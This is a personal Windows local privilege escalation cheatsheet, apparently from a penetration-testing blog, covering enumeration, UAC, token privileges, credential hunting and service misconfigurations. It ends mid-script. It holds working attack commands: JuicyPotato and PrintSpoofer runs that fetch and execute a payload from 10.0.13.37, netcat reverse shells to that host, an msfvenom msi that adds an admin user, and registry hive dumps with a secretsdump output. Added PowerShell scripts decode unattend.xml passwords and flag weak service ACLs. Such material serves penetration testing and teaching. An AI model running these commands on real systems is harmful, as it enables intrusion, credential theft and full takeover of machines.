windows local privilege escalation
this is my windows privilege escalation cheatsheet, gonna keep this growing and updated over time
basic enumeration
PS C:\> whoami
PS C:\> whoami /priv # exploitable privileges?
PS C:\> whoami /groups # administrator?
PS C:\> hostname
PS C:\> ipconfig /all ; route print ; arp -a # network information
PS C:\> netstat -anto | Select-String "listening" # check for services on loopback
PS C:\> netstat -anto | Select-String "established" # check outgoing connections
PS C:\> netsh advfirewall show allprofiles # firewall settings
PS C:\> Get-ChildItem 'Env:' | ft Key,Value # show environment variables
PS C:\> net user # get local users
PS C:\> net user /domain # get domain users
PS C:\> ls -force /Users/ # see home folders
PS C:\> ls -force / # check for interesting files or directories
PS C:\> tree /f /a \Users # check for interesting files
PS C:\> cat (Get-PSReadlineOption).HistorySavePath # read powershell history
PS C:\> Get-Process # check running processes
PS C:\> tasklist /svc # check running processes
PS C:\> tasklist /v /fi "username eq system" # SYSTEM processes
PS C:\> Get-Service # check services
PS C:\> Get-PSDrive # check attached drives
whoami /all
PS C:\> whoami /all # see username, groups and privileges
USER INFORMATION
----------------
User Name SID
==================== ============================================
client\administrator S-1-5-21-524867371-2016665888-3240400722-500
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================= ================ ============================================ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
CLIENT\Group Policy Creator Owners Group S-1-5-21-524867371-2016665888-3240400722-520 Mandatory group, Enabled by default, Enabled group
CLIENT\Domain Admins Group S-1-5-21-524867371-2016665888-3240400722-512 Mandatory group, Enabled by default, Enabled group
CLIENT\Schema Admins Group S-1-5-21-524867371-2016665888-3240400722-518 Mandatory group, Enabled by default, Enabled group
CLIENT\Enterprise Admins Group S-1-5-21-524867371-2016665888-3240400722-519 Mandatory group, Enabled by default, Enabled group
CLIENT\Denied RODC Password Replication Group Alias S-1-5-21-524867371-2016665888-3240400722-572 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
the interesting bits to watch out for are:
- Mandatory Label\High Mandatory Level: the current process is running elevated (high integrity)
- BUILTIN\Administrators: our user is in the local administrators group
- CLIENT\Domain Admins: our user is a domain administrator
systeminfo
PS C:\> systeminfo
Host Name: DC04
OS Name: Microsoft Windows Server 2016 Standard
OS Version: 10.0.14393 N/A Build 14393
OS Manufacturer: Microsoft Corporation
OS Configuration: Primary Domain Controller
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00376-30821-30176-AA955
Original Install Date: 4/16/2018, 12:09:40 AM
System Boot Time: 4/14/2021, 10:16:19 PM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory: 4,095 MB
Available Physical Memory: 2,647 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 3,445 MB
Virtual Memory: In Use: 1,354 MB
Page File Location(s): C:\pagefile.sys
Domain: CLIENT.DOMAIN.COM
Logon Server: N/A
Hotfix(s): 4 Hotfix(s) Installed.
[01]: KB3199986
[02]: KB4049065
[03]: KB4520724
[04]: KB4571694
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) 82574L Gigabit Network Connection
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 172.16.4.5
[02]: fe80::8975:cd87:5c81:1f7f
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
interesting things here:
- OS Name: Microsoft Windows Server 2016 Standard and OS Version: 10.0.14393 N/A Build 14393 narrow down which kernel exploits apply
- hotfixes
01: KB3199986
02: KB4049065
03: KB4520724
04: KB4571694
the installed hotfixes can be cross-checked against the microsoft security bulletins to find missing patches (for example, windows-exploit-suggester or wesng do this by ingesting systeminfo output)
- System Type: x64-based PC is important, since we might have to compile binaries for the target to run an exploit, or upload tools like netcat, mimikatz and so on; those need to match the architecture of the target.
common methods
user in local administrator group (UAC bypass)
see if your user is part of an administrative group
PS C:\> whoami /groups # in administrators group
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================= ================ ============================================ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
user in local admin group -----------> BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
but medium integrity process -----------> Mandatory Label\Medium Mandatory Level Label S-1-16-8192
check UAC (user account control):
# check if enabled
PS C:\> Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | Select-Object EnableLUA
EnableLUA
---------
1
# check behavior
PS C:\> Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | Select-Object ConsentPromptBehaviorAdmin
ConsentPromptBehaviorAdmin
--------------------------
5
# 0 -> elevate without prompting (UAC effectively off for admins)
# 1 -> prompt for credentials on the secure desktop
# 2 -> prompt for consent on the secure desktop ("always notify", also prompts for windows binaries)
# 3 -> prompt for credentials (no secure desktop)
# 4 -> prompt for consent (no secure desktop)
# 5 (default) -> prompt for consent only for non-windows binaries; windows binaries marked autoElevate run elevated without a prompt
in such a situation (member of the local administrators group, medium integrity, ConsentPromptBehaviorAdmin 5) it might be possible to bypass UAC. there are various techniques depending on the exact windows version, but eventvwr and fodhelper are the best known: both abuse an auto-elevating windows binary that reads a command from a registry key under HKCU, which you can write at medium integrity.
note that most UAC bypasses are variations on this theme: hijack a registry key, a dll or a COM object that an auto-elevating binary trusts. at level 2 ("always notify") auto-elevation is off and these do not work.
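to put the checks above in one place, here is an added example (mine, not from the original cheatsheet) that reads the token the way whoami shows it, reads the UAC policy values, and says whether you are an admin stuck in a medium-integrity token with auto-elevation still enabled. the verdict strings are my own interpretation of the values; the registry keys and SIDs are the ones used above.

```powershell
# Added example, not from the original page: summarise admin group membership, integrity level,
# EnableLUA and ConsentPromptBehaviorAdmin and say whether this is a UAC-bypass situation.
function Get-UacContext {
    # token view taken from whoami so it matches the listing shown in the page
    $groups = whoami /groups /fo csv | ConvertFrom-Csv
    $admin  = $groups | Where-Object { $_.SID -eq 'S-1-5-32-544' }
    $label  = $groups | Where-Object { $_.SID -like 'S-1-16-*' } | Select-Object -First 1
    $rid    = if ($label) { [int]$label.SID.Split('-')[-1] } else { -1 }
    $level  = switch ($rid) {
        4096    { 'Low' }
        8192    { 'Medium' }
        12288   { 'High' }
        16384   { 'System' }
        default { "Unknown($rid)" }
    }
    # in a filtered (medium) admin token the group is still listed but marked "used for deny only"
    $adminDenyOnly = [bool]$admin -and ($admin.Attributes -match 'deny only')

    $pol = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $meaning = @{
        0 = 'elevate silently'
        1 = 'prompt for credentials on the secure desktop'
        2 = 'prompt for consent on the secure desktop (always notify)'
        3 = 'prompt for credentials'
        4 = 'prompt for consent'
        5 = 'prompt for consent for non-Windows binaries only (default)'
    }
    $lua  = [int]$pol.EnableLUA
    $cpba = [int]$pol.ConsentPromptBehaviorAdmin

    $verdict = if (-not $admin) { 'not in the local Administrators group; UAC is irrelevant, look elsewhere' }
        elseif ($level -eq 'High') { 'already elevated' }
        elseif ($lua -ne 1)        { 'UAC disabled: processes started by this account get the full admin token' }
        elseif ($cpba -eq 0)       { 'no prompt configured: just start an elevated process (Start-Process -Verb RunAs)' }
        elseif ($cpba -eq 5)       { 'default level: auto-elevating windows binaries (fodhelper, eventvwr, ...) run without a prompt' }
        else                       { "level $cpba prompts for every elevation; auto-elevation bypasses will not fire silently" }

    [pscustomobject]@{
        InAdminGroup               = [bool]$admin
        AdminTokenFiltered         = $adminDenyOnly
        IntegrityLevel             = $level
        EnableLUA                  = $lua
        ConsentPromptBehaviorAdmin = "$cpba ($($meaning[$cpba]))"
        PromptOnSecureDesktop      = [int]$pol.PromptOnSecureDesktop
        Verdict                    = $verdict
    }
}

Get-UacContext | Format-List
```

the AdminTokenFiltered field is the tell: whoami still lists BUILTIN\Administrators in a medium-integrity admin shell, but with the "Group used for deny only" attribute, which is exactly the state the listing above shows.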
privileges
PS C:\> whoami /priv
PS C:\> whoami /groups # local admin?
see also microsoft docs about privileges and this amazing slide from andrea pierini
there are a lot of ways to abuse privileges, but the most common ones are:
- SeImpersonatePrivilege // SeAssignPrimaryTokenPrivilege // SeCreateTokenPrivilege
- SeBackupPrivilege // SeRestorePrivilege
- SeLoadDriverPrivilege
- SeTakeOwnershipPrivilege
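an added example (mine, not part of the original page) that triages whoami /priv against the privileges listed above plus SeDebugPrivilege and SeTcbPrivilege. the point it makes that the list alone does not: a privilege shown as Disabled is still in the token and the process can enable it for itself, so only absence from the list matters. the sample CSV rows are constructed to match whoami's /fo csv layout.

```powershell
# Added example, not from the page: flag abusable privileges in `whoami /priv` output.
# "Disabled" still counts: the privilege is present in the token and the process can
# turn it on with AdjustTokenPrivileges; only privileges missing from the list are out of reach.
function Get-AbusablePrivileges {
    param(
        # default runs against the live token; pass captured lines to analyse output from another host
        [string[]]$PrivCsv = (whoami /priv /fo csv)
    )
    $abusable = [ordered]@{
        SeImpersonatePrivilege        = 'impersonate a SYSTEM token (JuicyPotato, PrintSpoofer, ...)'
        SeAssignPrimaryTokenPrivilege = 'assign a SYSTEM primary token to a new process (potato family)'
        SeCreateTokenPrivilege        = 'forge an arbitrary token'
        SeBackupPrivilege             = 'read any file or registry hive regardless of ACL (SAM/SYSTEM/SECURITY)'
        SeRestorePrivilege            = 'write any file or registry key regardless of ACL'
        SeLoadDriverPrivilege         = 'load a signed but vulnerable driver and run code in the kernel'
        SeTakeOwnershipPrivilege      = 'take ownership of any object, then grant yourself access'
        SeDebugPrivilege              = 'open any process (lsass, SYSTEM processes) for token theft or injection'
        SeTcbPrivilege                = 'act as part of the OS (create logon sessions with arbitrary tokens)'
    }
    $PrivCsv | ConvertFrom-Csv |
        Where-Object { $abusable.Contains($_.'Privilege Name') } |
        ForEach-Object {
            [pscustomobject]@{
                Privilege = $_.'Privilege Name'
                State     = $_.State
                Abuse     = $abusable[$_.'Privilege Name']
            }
        }
}

# constructed sample in the CSV shape whoami emits, so the function can be tried offline
$sample = @(
    '"Privilege Name","Description","State"',
    '"SeChangeNotifyPrivilege","Bypass traverse checking","Enabled"',
    '"SeImpersonatePrivilege","Impersonate a client after authentication","Enabled"',
    '"SeBackupPrivilege","Back up files and directories","Disabled"',
    '"SeIncreaseWorkingSetPrivilege","Increase a process working set","Disabled"'
)
Get-AbusablePrivileges -PrivCsv $sample | Format-Table -AutoSize
# on the target itself:
# Get-AbusablePrivileges | Format-Table -AutoSize
```

with the sample input it reports SeImpersonatePrivilege (Enabled) and SeBackupPrivilege (Disabled) and ignores the two harmless ones.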
SeImpersonatePrivilege // SeAssignPrimaryTokenPrivilege // SeCreateTokenPrivilege
if you run as a service account (IIS application pool, MSSQL, etc.) with SeImpersonatePrivilege, you are effectively SYSTEM: you can coerce a SYSTEM process into authenticating to something you control and impersonate the resulting token.
juicy potato
take a look at the original rotten potato paper
you can use juicy potato exploit to spawn a process as nt authority\system
by token impersonation:
PS C:\> ./JuicyPotato.exe -t * -p C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -a "iex(iwr -uri 10.0.13.37/payload.ps1 -usebasicparsing)" -l 1337
printspoofer
works also on windows server 2019 and windows 10 1809+ with SeImpersonatePrivilege, where the DCOM trick JuicyPotato relies on is patched
PS C:\> ./PrintSpoofer64.exe -c "powershell iex(iwr -uri 10.0.13.37/payload.ps1 -usebasicparsing)"
SeBackupPrivilege // SeRestorePrivilege
SeBackupPrivilege lets you read any file or registry hive regardless of its ACL, and SeRestorePrivilege lets you write anywhere. with the backup privilege we can copy the SAM, SYSTEM and SECURITY hives (local hashes, boot key, LSA secrets and cached domain credentials) to extract hashes; reg save only needs the backup privilege:
PS C:\Windows\Temp> reg save HKLM\SAM SAM
PS C:\Windows\Temp> reg save HKLM\SYSTEM SYSTEM
PS C:\Windows\Temp> reg save HKLM\SECURITY SECURITY
and then transfer the saved hives on your machine to dump hashes:
$ secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0x8d1b3bcb293ec2bacf262ca05e9827c9
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:19a3322455162a546ea115764e41817e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:7025790b5bb6b1c87aff52f9fd307ce1:::
joe:1001:aad3b435b51404eeaad3b435b51404ee:45281a1a414c1b153240f4de7f92f1gd:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DPAPI_SYSTEM
dpapi_machinekey:0x74fc756809afe15e43878238324saf2a395e13d5
dpapi_userkey:0x3fc57e5af5f687620a96e594694dca9c1dd382d3
0000 0C EF 72 8A 43 7E B4 55 55 BE ED 92 C6 D9 01 11 ..r.C~.UU.......
0010 DA 01 E1 C2 E3 83 93 D6 A9 B3 75 42 64 F6 43 86 ..........uBd.C.
0020 4B 57 29 42 05 FF 94 D7 9E A9 44 9A DE 97 89 FB KW)B......D.....
0030 9E 0E A6 86 DB C9 2E 44 6E A7 08 29 D4 F4 FD 66 .......Dn..)...f
[*]NL$KM:0cef728a434eb45555beed92c6d90111da01e1c2e38393d619b3754264f643864b57294205ff94d79ea9449ade9789fb9e0ea686dbc92e446ea70829d4f4f266
[*] Cleaning up...
SeLoadDriverPrivilege
also see Abusing SeLoadDriverPrivilege. you can load a signed but vulnerable driver (Capcom.sys is the classic) and exploit it to get code running in the kernel, i.e. SYSTEM context. note that sc.exe create needs write access to the service control manager, which a normal user does not have; with only SeLoadDriverPrivilege you register the driver under HKCU\System\CurrentControlSet\Services\<name> instead and call NtLoadDriver with the \Registry\User\<SID>\... path, which is what the post referenced above describes. with admin rights the sc.exe route works:
PS C:\> sc.exe create Capcom type="kernel" binPath="C:\Users\user\Desktop\Capcom.sys"
PS C:\> sc.exe start Capcom
SeTakeOwnershipPrivilege
allows you to take ownership of any object
PS C:\> takeown /f "C:\Program Files"
PS C:\> icacls.exe "C:\Program Files" /grant "$($env:USERNAME):F"
being the owner only gives you WRITE_DAC, hence the icacls step to grant yourself full control. after that you can replace a binary in that directory that a privileged service or scheduled task runs, or drop a dll for it to pick up.
credentials
search for clear text credentials
check these files for exposed credentials:
C:\unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\sysprep\sysprep.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
C:\inetpub\wwwroot\web.config
they can be in different paths, so it might make sense to also search for them:
PS C:\> cmd /c dir /s /b sysprep.xml # search for sysprep.xml
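the unattend and sysprep files above usually do not hold the password in the clear: when PlainText is false, windows stores base64 of the UTF-16LE password with the literal string "Password" appended (for AutoLogon) or "AdministratorPassword" appended (for the UserAccounts element). here is an added example (mine, not from the page) that walks the paths listed above, pulls every password element out of the xml, and decodes it; the sample answer file is constructed and written to %TEMP% so the function can be exercised offline.

```powershell
# Added example, not from the page: locate answer files and decode the passwords in them.
# Encoded form is base64(UTF-16LE(password + suffix)); suffix is "Password" for
# <AutoLogon><Password> and "AdministratorPassword" for <UserAccounts><AdministratorPassword>.
function ConvertFrom-UnattendPassword {
    param([string]$Base64, [string]$Suffix)
    try {
        $s = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Base64))
    } catch { return "<not base64, probably plain text: $Base64>" }
    if ($s.EndsWith($Suffix)) { $s.Substring(0, $s.Length - $Suffix.Length) } else { $s }
}

function Get-UnattendCredentials {
    param([string[]]$Paths = @(
        'C:\unattend.xml', 'C:\Windows\Panther\Unattend.xml', 'C:\Windows\Panther\Unattend\Unattend.xml',
        'C:\sysprep\sysprep.xml', 'C:\Windows\system32\sysprep\sysprep.xml'
    ))
    foreach ($p in $Paths) {
        if (-not (Test-Path -LiteralPath $p)) { continue }
        try { [xml]$doc = Get-Content -LiteralPath $p -Raw } catch { continue }
        # local-name() sidesteps the urn:schemas-microsoft-com:unattend namespace
        $nodes = $doc.SelectNodes("//*[local-name()='Password' or local-name()='AdministratorPassword']")
        foreach ($n in $nodes) {
            $value = $n.SelectSingleNode("*[local-name()='Value']")
            if (-not $value) { continue }            # a <Password> used as a bare string, skip
            $plain = $n.SelectSingleNode("*[local-name()='PlainText']")
            $user  = $n.ParentNode.SelectSingleNode("*[local-name()='Username' or local-name()='Name']")
            $suffix = if ($n.LocalName -eq 'AdministratorPassword') { 'AdministratorPassword' } else { 'Password' }
            # absent PlainText is treated as encoded; a plain value then shows up as the "<not base64 ...>" marker
            $pw = if ($plain -and $plain.InnerText -eq 'true') { $value.InnerText } else { ConvertFrom-UnattendPassword $value.InnerText $suffix }
            $who = if ($user) { $user.InnerText } elseif ($suffix -eq 'AdministratorPassword') { 'Administrator' } else { '' }
            [pscustomobject]@{ File = $p; Element = $n.LocalName; User = $who; Password = $pw }
        }
    }
}

# constructed sample answer file (not a real one), written to %TEMP% for the demo
$enc = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('Password1' + 'Password'))
$sample = @"
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password><Value>$enc</Value><PlainText>false</PlainText></Password>
        <Enabled>true</Enabled>
        <Username>svc_deploy</Username>
      </AutoLogon>
    </component>
  </settings>
</unattend>
"@
$tmp = Join-Path $env:TEMP 'unattend-sample.xml'
Set-Content -LiteralPath $tmp -Value $sample -Encoding UTF8
Get-UnattendCredentials -Paths $tmp | Format-Table -AutoSize   # svc_deploy / Password1
Remove-Item -LiteralPath $tmp
# live: Get-UnattendCredentials | Format-Table -AutoSize
```

run it without -Paths on the target to check the default locations; combine with the dir /s search above for copies in odd places.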
also search file contents for ‘password’ or some other string:
PS C:\Users> findstr /spin "password" *.* # search all files with extensions
PS C:\Users> findstr /spin "secret" *.*
PS C:\Users> findstr /spin "password" *.txt *.ini *.config *.xml # search specific extensions
you should search inside Users or Program Files directory to reduce the amount of false positives
search the registry for passwords as well (can be a lot of entries here):
PS C:\> reg query HKLM /f password /t REG_SZ /s
PS C:\> reg query HKCU /f password /t REG_SZ /s
dpapi saved credentials
# credentials
PS C:\> ls -force $env:LOCALAPPDATA/Microsoft/Credentials/
PS C:\> ls -force $env:APPDATA/Microsoft/Credentials/
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 4/29/2018 1:26 AM 422 45C236B9B8A454F3E4D0538A6F6C5842
-a-hs- 5/13/2018 4:28 PM 494 EBBFB3FE75D4A2D06163ED0DA58805FB
# masterkeys (also check LOCALAPPDATA)
PS C:\> ls -force $env:APPDATA/Microsoft/Protect/
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 9/18/2020 11:33 AM S-1-5-21-2291914956-3290296217-2402366952-1122
-a-hs- 4/24/2018 12:03 AM 24 CREDHIST
-a-hs- 9/18/2020 6:03 PM 76 SYNCHIST
PS C:\> ls -force $env:APPDATA/Microsoft/Protect/S-1-5-21-2291914956-3290296217-2402366952-1122
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 9/18/2020 11:33 AM 740 3b7bc2e9-40f9-408d-82cd-b09e535fdce0
-a-hs- 6/4/2020 4:43 PM 740 4c2003e9-effc-4f96-a468-9b66acfa87a3
-a-hs- 4/24/2018 12:03 AM 900 BK-CORP
-a-hs- 6/4/2020 4:43 PM 740 d21c87da-fc2a-4d38-b14f-a8e47da3b7a9
-a-hs- 6/4/2020 4:43 PM 740 d9091ed6-ca04-4693-8fe3-77f0143318ea
-a-hs- 9/18/2020 11:33 AM 24 Preferred
if you know the user password, you can decrypt the masterkeys using mimikatz (dpapi) and unlock the saved user credentials
recycle bin
# recycle bin is accessible over shell namespace 10
PS C:\> $shell = New-Object -com shell.application
PS C:\> $rbin = $shell.Namespace(10)
PS C:\> $items = $rbin.Items()
PS C:\> $items | select -first 2
PS C:\> $items[0] # or [1], [2], etc.
runas
if you already know the administrator password, you could just spawn a process
PS C:\> runas /env /noprofile /user:Administrator "C:\Windows\System32\cmd.exe"
runas does not accept the password on the command line; it prompts for it, so it needs an interactive console and fails from a bare reverse shell. if the user has stored the credential with /savecred no prompt is needed.
pscredential
you can create a pscredential if you know a user’s password
PS C:\> $SecPasswd = ConvertTo-SecureString "Password1" -AsPlainText -Force
PS C:\> $Cred = New-Object System.Management.Automation.PSCredential("Administrator", $SecPasswd)
PS C:\> $Domain = "DC01" # domain of the account; for a local account use the hostname or "."
PS C:\> [System.Diagnostics.Process]::Start("C:\temp\nc.exe", "10.0.13.37 1337 -e cmd", $Cred.UserName, $Cred.Password, $Domain)
PS C:\> Start-Process -FilePath "C:\temp\nc.exe" -ArgumentList "10.0.13.37 1337 -e cmd" -Credential $Cred # same thing, cmdlet form
both go through the secondary logon service (CreateProcessWithLogonW), so they fail if that service is disabled or you are in a session without an interactive window station.
misconfigurations
insecure permissions
look for files and programs with insecure permissions using accesschk.exe from Windows Sysinternals
# show effective access of current user
# -u suppress errors
# -s recurse
# -w show only writable
PS C:\> ./accesschk.exe -accepteula -wsu C:\*.*
# weak directory permissions, writable dirs
PS C:\> ./accesschk.exe -accepteula -wsud "Everyone" C:\*.*
PS C:\> ./accesschk.exe -accepteula -wsud "Users" C:\*.*
PS C:\> ./accesschk.exe -accepteula -wsud "Authenticated Users" C:\*.*
# -c check services permissions (use * for all)
PS C:\> ./accesschk.exe -accepteula -wsuc * # current user
PS C:\> ./accesschk.exe -accepteula -wsuc "Everyone" *
PS C:\> ./accesschk.exe -accepteula -wsuc "Authenticated Users" *
these can then be overwritten with malicious executables or dll. malicious code is executed when the service is restarted (reboot can also work).
also check for file permissions using icacls:
C:\> icacls "C:\Program Files\*" | findstr "(F) (M) :\" | findstr /i ":\ everyone authenticated users %username%"
C:\> icacls "C:\Program Files (x86)\*" | findstr "(F) (M) :\" | findstr /i ":\ everyone authenticated users %username%"
(these are cmd one-liners: %username% only expands in cmd; from powershell use $env:USERNAME instead)
PS C:\Program Files\> icacls.exe * | findstr "(F)" # full access
PS C:\Program Files\> icacls.exe * | findstr "(M)" # modify access
always install elevated
check if AlwaysInstallElevated is set to 1 in both the machine and the user key:
PS C:\> Get-ItemProperty HKLM:\Software\Policies\Microsoft\Windows\Installer
PS C:\> Get-ItemProperty HKCU:\Software\Policies\Microsoft\Windows\Installer
if both values are 1, every msi installed by this user runs as SYSTEM, so you can create an msi package and install it with elevated privileges
$ msfvenom -p windows/adduser USER=hacker PASS=evil -f msi -o evil.msi
$ msfvenom -p windows/adduser USER=hacker PASS=evil -f msi-nouac -o evil.msi
PS C:\> msiexec /quiet /qn /i C:\Windows\Temp\evil.msi
service manipulation
you can look for:
- modifiable service
- writable service executable
- unquoted service path
- hijackable dll
in most cases if any of those are present, you can get code execution as that service’s user (usually SYSTEM). as you can imagine, this goes hand in hand with insecure permissions :)
# show services
PS C:\> Get-Service
# get list of all service names
PS C:\> sc.exe query | select-string service_name
# check the configuration of a specific service
PS C:\> sc.exe qc <ServiceName>
# check permissions for specific service
PS C:\> sc.exe sdshow <ServiceName>
# get executable path for all processes
PS C:\> wmic process list full | select-string 'executablepath=C:'
PS C:\> wmic process list full | select-string 'executablepath=C:' | select-string -notmatch 'system32|syswow'
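sc.exe sdshow prints the service DACL as SDDL, which is not much fun to read by hand. the following is an added example (mine, not from the page) that parses it directly and flags access-allowed ACEs that give Everyone, Users, Authenticated Users or Interactive the rights that matter for a service: DC (SERVICE_CHANGE_CONFIG, i.e. change binPath and the account), WD/WO (rewrite the ACL or take the object) and the generic write/all bits. the SDDL is parsed by hand because ConvertFrom-SddlString only knows file and registry right sets and would mislabel service rights. the sample SDDL is constructed.

```powershell
# Added example, not from the page: find services whose DACL lets a low-privileged principal
# reconfigure them. Two-letter SDDL rights are the service-specific meanings
# (DC = SERVICE_CHANGE_CONFIG, WD = WRITE_DAC, WO = WRITE_OWNER, GA/GW = generic all/write).
function Test-ServiceSddl {
    param(
        [string]$Name,
        [string]$Sddl,
        # SDDL aliases / SIDs that any logged-on user holds: Everyone, Users, Authenticated Users, Interactive
        [string[]]$LowPrivPrincipals = @('WD', 'BU', 'AU', 'IU', 'S-1-1-0', 'S-1-5-32-545', 'S-1-5-11', 'S-1-5-4')
    )
    $bad  = [ordered]@{ DC = 'SERVICE_CHANGE_CONFIG'; WD = 'WRITE_DAC'; WO = 'WRITE_OWNER'; GA = 'GENERIC_ALL'; GW = 'GENERIC_WRITE' }
    $bits = @{ DC = 0x2; WD = 0x40000; WO = 0x80000; GA = 0x10000000; GW = 0x40000000 }   # same rights as a hex mask
    $dacl = ($Sddl -split 'S:')[0]                                                         # drop the SACL if present
    $acePattern = '\((?<type>[^;]*);(?<flags>[^;]*);(?<rights>[^;]*);[^;]*;[^;]*;(?<sid>[^)]*)\)'
    foreach ($m in [regex]::Matches($dacl, $acePattern)) {
        if ($m.Groups['type'].Value -ne 'A') { continue }          # access-allowed ACEs only
        $sid = $m.Groups['sid'].Value
        if ($LowPrivPrincipals -notcontains $sid) { continue }
        $r = $m.Groups['rights'].Value
        $granted = if ($r -like '0x*') {
            $mask = [Convert]::ToInt64($r.Substring(2), 16)
            $bits.GetEnumerator() | Where-Object { ($mask -band $_.Value) -ne 0 } | ForEach-Object { $bad[$_.Key] }
        } else {
            [regex]::Matches($r, '..') | ForEach-Object { $_.Value } | Where-Object { $bad.Contains($_) } | ForEach-Object { $bad[$_] }
        }
        if ($granted) {
            [pscustomobject]@{ Service = $Name; Principal = $sid; Rights = ($granted -join ',') }
        }
    }
}

function Get-WeakServiceAcl {
    foreach ($svc in Get-CimInstance Win32_Service) {
        $sddl = (sc.exe sdshow $svc.Name | Where-Object { $_ -match '^D:' }) -join ''
        if (-not $sddl) { continue }                                 # access denied or nothing returned
        Test-ServiceSddl -Name $svc.Name -Sddl $sddl
    }
}

# constructed SDDL: the Authenticated Users ACE carries DC, so the service is reconfigurable by anyone
$weak = 'D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRRCSDRCWDWO;;;BA)(A;;CCDCLCSWRPWPDTLOCRRC;;;AU)'
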